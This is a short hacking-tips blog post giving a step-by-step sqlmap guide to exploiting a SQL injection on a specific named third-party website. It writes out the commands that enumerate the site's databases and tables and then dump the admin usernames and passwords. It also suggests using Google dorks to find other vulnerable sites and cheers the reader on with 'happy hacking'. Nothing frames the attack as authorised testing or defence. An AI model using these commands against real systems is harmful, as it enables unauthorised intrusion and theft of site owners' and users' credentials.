Welcome !>>>I'm Sharing Hacking Tips & Tricks for beginner & Studiers<<<<<>>>You Can try to get Study..........

..Thank For Visit & read.>>>>>

How To Hack Website Through SQLMAP (Step By Step GuideLine)

Everyone who want to learn Hacking, he must have knowledge about sqlmap & site vulnerabilty.

Requirements :-
Python27 or Sqlmap and sqli vulnerability website 

if you don't have any vulnerability site using Google Dorks    
Lets start Open you terminal and run sqlmap 

Now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 --dbs" without quotes and hit enter 
(--db = Database)
you can see this we got 2 databses
 [*] c2deuts_ice
 [*] information_schema
now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D  c2deuts_ice --tables" without quotes (-D mean database name and )
We got 25 tables  but we need only admin table 
now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D  c2deuts_ice -T admin --columns" without quotes (-T put table name )
you can see this we got admin usernames  and passwords for get password type follow commands
"sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D  c2deuts_ice -T admin -C username,password --dump" without quotes
you can see this wo got admin users and password 
Enjoy Happy hacking 
Like my page on facebook www.facebook.com/myanmarhackingschool and share this tutorials 
Thanks for visiting :D
MON$TER

Comentários:

Post a Comment

ေျပာခ်င္တာမ်ား ရွိက

Blogger Tips and TricksLatest Tips For BloggersBlogger Tricks
Related Posts Plugin for WordPress, Blogger...
 
©2012 M0N$T3R# Created by MÖN$TéR | Shad0w MÖN$TéR